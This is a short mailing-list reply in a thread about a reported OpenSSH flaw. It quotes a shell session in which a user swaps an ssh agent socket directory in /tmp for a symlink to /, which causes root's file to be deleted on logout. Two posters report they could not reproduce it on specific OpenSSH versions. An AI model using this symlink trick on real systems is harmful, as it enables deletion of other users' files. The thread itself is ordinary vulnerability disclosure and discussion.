Re: SSH allows deletion of other users files...
> [root@clarity /root]# touch /cookies;ls /cookies
> > /cookies
> > [root@clarity /root]# ssh zen@localhost
> > zen@localhost's password:
> > [zen@clarity zen]$ rm -r /tmp/ssh-XXW9hNY9/; ln -s / /tmp/ssh-XXW9hNY9
> > [zen@clarity zen]$ logout
>
> > [root@clarity /root]# ls /cookies
> > /bin/ls: /cookies: No such file or directory
>
> I could not duplicate this with OpenSSH 2.9p1-1 on Red Hat 6.2
>
I could not duplicate this with OpenSSH-1.2.3, protocol version 1.5 on a
Debian box.
Leonard Leblanc,
Webmaster / Intranet Administrator
www.emergeknowledge.com
Reply to: